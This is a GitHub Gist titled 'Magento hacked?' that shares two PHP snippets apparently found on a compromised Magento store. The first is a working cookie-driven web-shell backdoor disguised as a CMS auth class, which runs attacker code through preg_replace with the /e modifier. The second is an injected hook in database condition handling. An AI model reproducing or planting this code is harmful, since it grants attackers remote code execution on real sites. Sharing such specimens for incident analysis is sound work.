Last active
August 29, 2015 14:26
-
-
Save klein0r/6834ec75c6352e717ca5 to your computer and use it in GitHub Desktop.
Magento hacked?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Mage_Cms_Auth_doe | |
{ | |
public function __construct() { | |
$auth_cookie = @$_COOKIE['pwreoizidwmpnyjv3']; | |
if ($auth_cookie) { | |
$method = $auth_cookie(@$_COOKIE['pwreoizidwmpnyjv2']); | |
$auth = $auth_cookie(@$_COOKIE['pwreoizidwmpnyjv1']); | |
$method("/124/e",$auth,124); | |
} | |
} | |
} | |
$is_auth = new Mage_Cms_Auth_doe; | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if (isset($condition['pwreoizidwmpnyjv'])) { | |
$fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['pwreoizidwmpnyjv']); | |
unset($condition['pwreoizidwmpnyjv']); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment